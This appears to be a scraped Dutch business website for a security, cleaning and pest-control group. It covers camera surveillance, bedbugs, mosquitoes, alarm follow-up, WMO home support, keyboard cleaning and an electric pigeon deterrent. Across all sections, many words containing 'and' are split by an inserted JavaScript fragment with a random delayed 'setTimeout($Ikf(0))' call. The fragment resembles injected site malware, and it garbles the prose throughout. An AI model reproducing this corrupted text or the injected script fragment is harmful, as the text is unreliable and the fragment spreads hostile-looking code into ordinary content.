Samenwerking Peter Visser Techniek en Correct Groep

Invizi

Peter Visser Techniek uit Wijk en Aalburg en de Correct Groep uit Wijk en Aalburg zijn een samenwerking aangegaan op het gebied van digitale surveillance.

De nieuwe organisatie heet Invizi B.V. en gaat zich speciaal bezighouden met het bewaken op afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and met intelligente HD-camera’s, het zgn. Digitale Surveillant Systeem. Het Digitale Surveillant Systeem verhoogt de buitenbeveiliging van enkele momentopnamen naar fulltime intelligent cameratoezicht.

Bij het ongewenst betreden van een terrein geven de intelligente camera’s van Peter Visser direct een alarmmelding met beeldinformatie naar de Video Desk op de meldkamer van de Correct Groep. De Video Desk verifieert de beelden en onderneemt dan gelijk actie. Indringers kunnen zo op heterdaad worden betrapt en schade wordt voorkomen of beperkt. Het systeem is snel en eenvoudig te installeren dankzij de unieke “Invizi open Cloud module”. Deze brengt na aansluiting op internet volledig zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig een stabiele en beveiligde verbinding met de Video Desk tot standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.

Wilt u meer weten over deze dienst? Neem dan vrijblijvend contact op met Ton Bok van Invizi:

Invizi B.V.
Ambachtstraat 9b
4261 TJ Wijk en Aalburg

Tel: 0416 – 724 955

ton@invizi.nl
www.invizi.nl

Overlast van bedwantsen? Bestrijden en kosten

Bedwantsen, wat kun je er tegen doen?

Een bedwants, ook wel wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andluis of bedluis genoemd, is een insect die zichzelf voedt met het bloed van mens of (huis)dier. Bedwantsen zijn klein, gemiddeld ongeveer 6 mm. lang.
Bedwantsen kunnen heel lang zonder voedsel, namelijk tot zo’n 35 weken. Ze zijn roodbruin van kleur en na een ‘bloedmaaltijd’ worden ze donkerrood. Bedwantsen houden niet van licht. Na een nachtelijke bloedmaaltijd bij de mens gaan ze terug naar hun donkere schuilplaats.

Bedwantsen kunnen alleen leven in de directe nabijheid van mens en dier en komen het meest voor in slaapkamers. Als u uitwerpselen in de vorm van bruinzwarte puntjes op lakens, plinten of rondom schilderijen en stopcontacten aantreft, dan kunt u last hebben van bedwantsen. Ook kunt u in de buurt van hun schuilplaatsen donkere huidschilfertjes aantreffen. Bedwantsen kunnen zich makkelijk verspreiden omdat ze vrij snel lopen, ook tegen plafonds. Via scheuren en naden in muren en leidingen komen ze in andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere slaapkamers. Via bagage, meubilair of beddengoed komen bedwantsen in andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere woningen terecht.

Overzicht kenmerken bedwants

 • Grootte: 4,5 – 9 mm
 • Kleur: roodbruin tot donkerrood
 • Voorkeursplek: slaapkamers
 • Overlast/schade: huidirritatie en jeuk

Op welke manier kunt u overlast van bedwantsen ervaren?

Bedwantsen voeden zich met het bloed van mens of (huis)dier. Een beet van de bedwants veroorzaakt jeuk en zwellingen.

Zijn er risico’s voor de gezondheid?

Bedwantsen kunnen virussen of bacteriën bij zich dragen. Uit onderzoek is echter nog niet gebleken of door een beet van een bedwants iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and ook daadwerkelijk besmet kan raken. De klachten na beten van een bedwants kunnen variëren van geen reactie tot uitgebreide huidklachten, die waarschijnlijk nog dagen na blootstelling kunnen ontstaan. De wondjes genezen over het algemeen snel. Soms komen huidinfecties voor. Als de bultjes worden opengekrabd ontstaan littekens. De rode vlekjes zijn pas na enkele weken volledig verdwenen. De aanwezigheid van bedwantsen kan voor mensen een behoorlijke belasting betekenen, vooral door de paniek die erdoor kan ontstaan.

Wat kunt u zelf doen om overlast te voorkomen?

Overlast van bedwantsen komt doordat ze in uw spullen kruipen en u deze vervolgens verplaatst. Denk aan tassen en koffers. Deskundige bestrijding is het enige wat u kunt doen tegen overlast van bedwantsen.

Wat kan Plaagdierbeheersing van Correct doen?

Als u vermoedt dat u last hebt van bedwantsen, laat dan de bedwants door ons onderzoeken. Stuur ons hiervoor een duidelijke foto toe. Wij voeren naast de behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling van uw woning ook een buurtonderzoek uit om na te gaan of buurtbewoners dezelfde klachten hebben.

Behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelwijze

De plaatsen waar de bedwants vaak zit, zoals plinten in slaapkamers, de ombouw van bedden, random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden van matrassen, richels van bedden en achter schilderijen, worden allemaal behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeld. Wij verzoeken u dringend niets te verzetten of te verwijderen uit de ruimte voordat de behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling heeft plaatsgevonden. U dient hierna de behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelde ruimte(s) twee uur goed te luchten, voordat u er weer naar binnen kunt. Dit geldt ook voor huisdieren. Na de behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling mag u minimaal één week niet stofzuigen of schoonmaken, omdat u andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders de nawerking van het bestrijdingsmiddel beperkt.

Na de behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling moet beddengoed direct worden gewassen of gestoomd. Om het verplaatsen van bedwantsen te voorkomen, mag u behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeld meubilair etc. niet ‘verhuizen’ naar ruimten waar geen bestrijdingsmiddel is gebruikt. Na ongeveer vier tot zes weken komen we bij u langs voor controle. Vaak is een tweede behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling nodig.

Kosten

Als u overlast heeft dan adviseren we u graag. Dit kan telefonisch en/of op locatie. Er kunnen wel kosten verbonden zijn voor een bezoek aan huis of een behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling door een dierplaagbestrijder. (bij behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling worden de kosten van huisbezoek op de totale rekening in mindering gebracht). Die kosten worden altijd vooraf met u besproken. In bepaalde gevallen zijn de kosten voor rekening van de huiseigenaar.

Offerte aanvragen

Voor bedrijven en instellingen worden vrijblijvende offertes opgesteld.

Het nut van adequate alarmopvolging

Alarmopvolging

Alarmopvolging: De traditionele manier

Onder alarmopvolging verstaan we het opvolgen van alarmmeldingen. Meldingen die elektronisch worden gedaan vanuit een inbraak- of brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andmeldsysteem. Het systeem geeft een melding naar een particuliere alarmcentrale. De centralist ontvangt de melding en stelt volgens een vooraf bepaald protocol een waarschuwadres in kennis. Veelal wordt de eigenaar van het bedrijf of object zelf gebeld om op locatie te gaan controleren wat de oorzaak van de melding is. Soms maakt men afspraken met een beveiligingsbedrijf en laat men deze controle op locatie uitvoeren door een gediplomeerde beveiliger.

U kunt zich voorstellen dat er, indien er daadwerkelijk een inbraak gepleegd is, er op deze wijze veel kostbare tijd verloren gaat: De melding wordt vanuit het systeem verstuurd naar de alarmcentrale. De alarmcentrale stelt de contactpersoon of beveiligingsdienst in kennis. De contactpersoon of beveiliger rijdt naar de locatie toe en voert de controle uit. Degene die de controle uitvoert constateert dat er is ingebroken en neemt contact op met de politie.

Los van de tijd die verloren gaat loopt degene die de controle uitvoert de kans de inbrekers tegen het lijf te lopen. Deze willen uiteraard niet worden gepakt en zullen zich waarschijnlijk hevig verzetten, wat grote veiligheidsrisico’s met zich meebrengt. Een kat in het nauw maakt immers rare sprongen…

Wordt de politie dan niet direct gebeld? Het antwoord: Nee!

De politie komt pas in actie als de melding is geverifieerd en als gebleken is dat het een daadwerkelijke criminele daad betreft. Er zal dus door de contactpersoon of beveiliger een controle moeten plaatsvinden, waaruit blijkt dat er daadwerkelijk sprake is van een inbraak. Pas als dit gebleken is komt de politie ter plaatse.

Alarmopvolging 2.0: Het Correct-concept

In uw tuin of bedrijfsterrein wordt één of, indien nodig, meerdere camera’s geplaatst. Deze camera’s zijn voorzien van een detectiemodule, waardoor zij bij het detecteren van beweging een e-mail met foto’s van de situatie sturen naar de meldkamer van Correct Beveiliging én uzelf.

De meldkamermedewerker kan vanuit de meldkamer controleren wat er op uw terrein gebeurt. Hij schakelt vanaf een veilige afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and direct over naar live-beelden en kan precies zien wat er gebeurt. Doordat de detectie al in uw tuin of bedrijfsterrein plaatsvindt (en er dus een verificatie van de melding is) kan vroegtijdig worden vastgesteld dat er onbevoegden op uw terrein aanwezig zijn.

Doordat de politie en beveiligingsdienst al worden aangestuurd voordat de inbreker in uw pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and is, wordt de pakkans vele malen groter. In een heleboel gevallen wordt hierdoor zelfs een inbraak (en dus ook de schade) voorkomen. Al die tijd kijkt Correct Beveiliging en uzelf, als u dat wilt, mee.

De voordelen

De voordelen van het Correct-concept:

 • Vroegtijdige signalering waardoor voorkomen of beperken van braak- en gevolgschade;
 • Hele snelle verificatie van meldingen en dus een snelle aansturing van de politie;
 • Geen onnodige alarmopvolging door de surveillant;
 • Veiligheid: de eerste actie vindt op afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and plaats;
 • Monitoring vanuit een lokale meldkamer door deskundige medewerkers die bekend zijn met de omgeving.

De steekmug | Wat kun je er tegen doen?

Wat kun je doen tegen muggen?

Zomer!! Heerlijk, nou ja, wat je een zomer noemen mag dan…. Het lijkt er meer op of de moesson zo af en toe onze kant op komt. Van regen wordt je niet altijd even vrolijk. Toch is het typisch Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ands. De prachtige wolkendekken kom je veelal op beroemde schilderijen tegen. Of dat het vroeger altijd beter was…. Die zomers….

Het natte weer zorgt echter wel voor behoorlijke problemen. Het regent, dus het is nat. Maar niet dusdanig dat de straten vol lopen. Met uitzondering van een plaatselijke hoosbui blijft de overlast veelal toch redelijk beperkt. Het kwakkelt eerder. Dit noemen wij kwakkelweer. Voor de bestrijder op zich ook niet heel ongunstig.

Het zoemend geluid

Het meest irritante verschijnsel is toch wel de steekmug. In sommige streken ook wel mezik genoemd. Steekmuggen maken een zoemend geluid dat goed hoorbaar is als de mug dichtbij komt. Dit heeft deels te maken met de voortplanting van de muggen. Ze leven in het donker en kunnen elkaar moeilijk vinden. Muggen gebruiken daarom geluid om elkaar te kunnen lokaliseren in het donker. Alleen de (stekende) vrouwtjes maken zoemgeluiden, die worden opgevangen door de geveerde antennes van de mannetjes. Iedere soort produceert een iets andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander geluid, zodat de mannetjes niet paren met een vrouwtje van een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere soort.

Waar komt de steekmug voor?

Steekmuggen komen over de hele wereld voor, behalve in heel koude gebieden zoals rond de polen. Het verspreidingsgebied van veel soorten wordt groter door de opwarming van de aarde. Onder andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere de malariamug rukt hierdoor op naar het noorden. In Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and en België zijn steekmuggen hooguit irritant, maar ze zijn wereldwijd verantwoordelijk voor de dood van 1 op de 17 mensen: jaarlijks worden ongeveer 700 miljoen mensen besmet met een door steekmuggen verspreide ziekte.

Steekmuggen gebruiken zicht, maar nemen voornamelijk geuren en temperatuurverschillen waar om de gastheer op te sporen. De meeste muggen, zoals de Culex pipiens bijten zoogdieren en vogels, die eerst visueel worden opgespoord. Geuren en warmteverschillen worden pas opgemerkt als de mug dichterbij is.

Wat kun je er tegen doen?

Door het zogenoemde kwakkelweer ontstaan er in potjes en versierselen in de tuin kleine poeltjes water. In deze poeltjes gedijt de steekmug opperbest. Ook is de afwatering van de dakgoot, of het schoonhouden van het grinddak een heel goed preventiemiddel. Door de potjes om te keren, de versierselen droog te houden en zo af en toe het dak eens na te zien voorkomt u grotendeels de overlast van de steekmug. Een goede methode zijn ook de horren. Deze zijn veelal voor weinig geld te koop bij een bouwmarkt. Een beetje handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andige persoon maakt ze zelf op maat.

Een bestrijdingsmiddel kan veelal achterwege blijven. Toch slapeloze nachten?
Neem eens contact op om te kijken wat de mogelijkheden zijn.

Welke hulp kan ik thuis krijgen van de gemeente vanuit de Wmo?

Thuishulp Gemeente WMO

Wie maatschappelijke ondersteuning nodig heeft, kan een beroep doen op de Wmo. De gemeente onderzoekt met u welke ondersteuning u nodig heeft. Dat kan een maatwerkvoorziening of een algemene voorziening zijn. Een maatwerkvoorziening is afgestemd op uw situatie, zoals aanpassingen in uw woning. Een algemene voorziening staat open voor iedereen. Bijvoorbeeld een boodschappendienst.

Welke voorziening voor ondersteuning thuis

Bent u onvoldoende zelfredzaam of kunt u niet goed meedoen in de maatschappij? En kan uw netwerk ook niet bijdragen? Dan is de gemeente verplicht ondersteuning te bieden. In de wet staat niet wat voor soort voorziening dit moet zijn. Dat kan een algemene voorziening of een maatwerkvoorziening zijn. In een onderzoek (meestal een gesprek) stelt de gemeente met u vast wat u nodig heeft. Voor sommige voorzieningen geldt een eigen bijdrage.

Maatwerkvoorziening

Een maatwerkvoorziening is geen medische hulp. Voorbeelden maatwerkvoorzieningen zijn:

 • vervoersvoorziening;
 • vervoer in de regio (voor mensen die slecht ter been zijn en niet met het openbaar vervoer kunnen reizen);
 • individuele begeleiding;
 • beschermde woonplek;
 • dagbesteding op maat;
 • ondersteuning bij het opzetten van een planning;
 • huishoudelijke hulp (zoals hulp bij het opruimen, schoonmaken en ramen zemen).

Algemene voorziening

Soms bent u geholpen met een zogenaamde ‘algemene voorziening’. Een algemene voorziening is vrij toegankelijk, zonder voorafgaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and onderzoek naar uw persoonlijke omstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andigheden. Voorbeelden van algemene voorzieningen zijn:

 • boodschappendienst;
 • het advies- en meldpunt huiselijk geweld en kindermishandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling;
 • een ontmoetingsruimte voor mensen die eenzaam zijn;
 • maaltijdverzorging (ook wel warme maaltijdvoorziening of tafeltje-dekje genoemd);
 • maatschappelijke opvang (bijvoorbeeld blijf-van-mijn-lijfhuizen en daklozenopvang);

15.000 schoonmakers dagelijks aan het werk

De Schoonmaak- en glazenwassersbranche doet ertoe. Bijna 15.000 schoonmakers zijn dagelijks druk in de weer met hun vak. Het is belangrijk werk, dat gezien mag worden. De schoonmaak- en glazenwassersbranche is een sector die er economisch toe doet. En een sector die maatschappelijk veel toevoegt. Ook dat mag gezien worden.

Economisch belang

In Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and gaat ruim 4 miljard euro in de schoonmaak- en glazenwassersbranche om. Dit is goed voor ongeveer 1% van het Bruto Nationaal Product. Daarmee is de branche een belangrijke factor in ons landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and telt ruim 11.000 aanbieders van schoonmaakdiensten. Daarmee vormt de branche ongeveer 1% van het Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse bedrijvenbestandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.

Vooral vereenzaming en vervuiling

Medewerkers van thuiszorgorganisaties zien vereenzaming en vervuiling als vaker voorkomende problemen bij hun cliënten. Uit een enquête die gehouden is onder 629 medewerkers in de huishoudelijke verzorging die aangesloten zijn bij vakbond FNV, concludeert onderzoeksprogramma De Monitor dat dit een gevolg is van een korting op het aantal hulpuren.

Naast vervuiling (75 procent) en vereenzaming (66 procent) zeggen de ondervraagde medewerkers ook steeds vaker te zien dat cliënten zelf een poging doen tot huishoudelijke werkzaamheden. Meer dan 40 procent van de ondervraagden zegt dat cliënten daarbij verwondingen oplopen. Ook zou de druk op de thuiszorgwerkers groot zijn om hun werk op tijd af te krijgen.

Doekle Terpstra, lid van de transitiecommissie Sociaal Domein die toezicht houdt op de decentralisaties in de zorg, zegt te schrikken van de meldingen van de thuiszorgmedewerkers. “Het is dramatisch als we dat tegenkomen”, zegt Terpstra in reactie op de conclusies van het programma.

Correct Groep: ook thuis in de zorg.

Toetsenbord schoonmaken

Hoe maak je een toetsenbord goed schoon

Wist u dat een wc-bril minder bacteriën bevat dan een toetsenbord? Onderzoek wijst dit uit. Dit komt waarschijnlijk doordat een wc-bril vaker wordt schoongemaakt dan een toetsenbord. Ongemerkt kruipen er miljoenen bacteriën over je computer, toetsenbord en muis. Hoe maak je deze schoon zonder de boel te beschadigen? Schakel om te beginnen alle apparatuur uit en haal de stekker(s) uit het stopcontact.

Toetsenbord schoonmaken

Broodkruimels, vocht, huidschilfers en stof: het vuil nestelt zich makkelijk tussen de toetsen. Hoe krijg je dat eruit?
• Houd het toetsenbord op z’n kop en schud het heen en weer.
• Spuit wat lucht uit een persluchtflesje onder de toetsen of gebruik een stofzuiger met een smal opzetstuk.
• Reinig de toetsen met een licht vochtig doekje.

Beeldscherm schoonmaken

De monitor wordt smoezelig door stof, vocht en vet. Het scherm trekt stof aan, je wijst een keer iets aan of je trekt een blikje fris open waardoor de coating wordt aangetast.
• Zet het beeldscherm uit tot het is afgekoeld.
• Veeg met een droge doek voorzichtig het stof weg.
• Vervolgens met een klamvochtig microvezeldoek het beeldscherm schoonmaken

Muis schoonmaken

Een vochtig doekje met eventueel wat schoonmaakmiddel is al voldoende, zéker voor een optische muis. Heb je een ouderwetse muis met bal?
• Verwijder dan het klepje aan de onderkant.
• Haal de muisbal eruit en maak deze schoon met een licht vochtige doek.
• Maak de wieltjes en rolletjes voorzichtig schoon

Meldpunt Altena

Correct beveiliging draagt bij aan een veiligere samenleving. Dit doen wij actief door het beveiligen van objecten. Wij kunnen dit echter niet alleen. Inwoners zijn de oren en ogen van een wijk of buurt. Iedereen maakt weleens in zijn of haar omgeving een onveilige of verdachte situatie mee. Daarom is het initiatief Meldpunt Altena gestart. Ook door een melding te maken, en deze te delen via sociale media, kunnen we samen zorgen voor een veiligere leefomgeving in de regio Altena.

Doe een melding

Door informatie te verzamelen en te delen is het mogelijk om in samenwerking met de gemeentes en de politie aan een veiligere omgeving te werken. Meldpunt Altena is actief in de gemeentes Aalburg, Werkendam en Woudrichem.

Om een melding te doen voert u zo specifiek mogelijk in wat u ziet of hoort. Vul hierbij ook uw persoonlijke gegevens in. Wanneer u een melding heeft geplaatst wordt deze door Meldpunt Altena gescreend en op de website geplaatst.

Uw gegevens worden vertrouwelijk behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeld en uw melding wordt anoniem geplaatst.

Duivenoverlast bestrijden met pulssysteem

Duivenoverlast dak bestrijden dakpannen

Daar waar duiven rusten (“roesten” in duiventermen), deponeren zij hun uitwerpselen. De vervuiling die door de vaak massale aanwezigheid van duiven optreedt, leidt in combinatie met nesten en kadavers tot soms ernstige directe en indirecte schade aan gebouwen. Gebouweigenaren kunnen maatregelen nemen om duiven van hun gebouw te weren. In dit blog gaan wij in op de diverse manieren van het bestrijden van duivenoverlast.

Elektromagnetisch Pulssysteem

Een elektromagnetisch pulssysteem, ook elektrostatisch systeem genoemd, bestaat uit een tweetal draden vlak bij elkaar. Wanneer een duif landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andt, raken zijn poten beide draden en krijgt hij kleine stroomstootjes. Deze elektrische puls wordt door een elektromagneet opgewekt. De methode is effectief, ook op de lange termijn, omdat er geen gewenning optreedt. Het stroomstootje dat de duif krijgt, is voor hem niet schadelijk en de methode is daarom diervriendelijk. Het probleem is de aanleg van een elektrische installatie en de bevestiging van de draden. Zij worden namelijk op de ondergrond geschroefd of gelijmd. De problemen daarvan zijn gelijk aan die bij pennen. Dit systeem werkt erg goed.

Voorbeeld toepassing bij klant

Afgelopen periode hebben wij dit systeem bij meerdere klanten toegepast. Zo is onlangs weer een kerktoren voorzien van dit nagenoeg onzichtbare systeem. Door middel van het adverteren op het internet heeft het bestuur van de parochie ons bedrijf gevonden. Nog dezelfde dag hebben wij een inspectie mogen uitvoeren.

Andere systemen zoals pennen, draden, ultrasone of stroboscoop zijn geen enkele optie omdat dit het gebouw zichtbaar aantast. Daarom hebben wij eerdergenoemd systeem aangeboden. Wel stuiten wij op een probleem; het is op 35 meter hoogte en enkel via de buitenzijde bereikbaar. Hiervoor wordt een speciale hoogwerker gehuurd van het type: Teupen LEO40GTX. Deze hoogwerker is enorm compact en kan echt extreme dingen zoals tegen een helling staan etc.

De weersomstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andigheden zitten erg mee, het is zonnig en windstil. Op een stenen profiel van 20 cm bij een lengte van 5,5 meter worden de staven gemonteerd middels een plug en rvs schroeven. Dit alles op c.a. 50 cm onder de galmgaten. Echt heel spannend als het hele en halve uur bijna afslaan, je springt een gat in de lucht van de schrik.

Zodra de montage aan de buitenzijde is gerealiseerd wordt de stroomtoevoer van binnenuit gerealiseerd. Door een opening waardoor de kabels gaan voor de antennes van de telefoonaanbieder prikken wij onze voeding. Nog een aantal minuten en het is afgelopen met de overlast van vogels.

Om het effect goed te kunnen zien wachten wij met het aanprikken van de stekker tot er een aantal vogels zijn gaan zitten, niet wetende dat zo direct de schrik zal toeslaan. Mooi om dan het effect te filmen en te zien dat vogels erg slim zijn. Ze vliegen nog wat rondjes maar keren niet terug.

De omgeving wordt schoongespoten middels hogedruk, het afval opgeruimd, en de klus opgeleverd.

Kortom weer een mooi project afgerond.

Wist u dat:

 • Het met name deze stadsduiven en verdwaalde postduiven zijn, overigens ook afstammelingen van de rotsduif, die voor de overlast zorgen.
 • Een duif produceert per jaar 10 tot 12 kilo natgewicht of 2,5 kilo drooggewicht aan uitwerpselen.
 • Duivenmest bevat onder meer 17,8% fosforzuur en 3,3% zwavelzuur. De hoge zuurgraad heeft tot gevolg dat natuur- en baksteen, koper, lood, zink en verflagen versneld worden aangetast.
 • Wetenschappelijk onderzoek heeft uitgewezen dat verwilderde duiven nagenoeg geen risico vormen voor de volksgezondheid.
 • Het terugdringen en controleren van het voedselaanbod, zowel van het gevoerde voedsel als van het zwerfvuil, een onmisbaar onderdeel is van de bestrijding.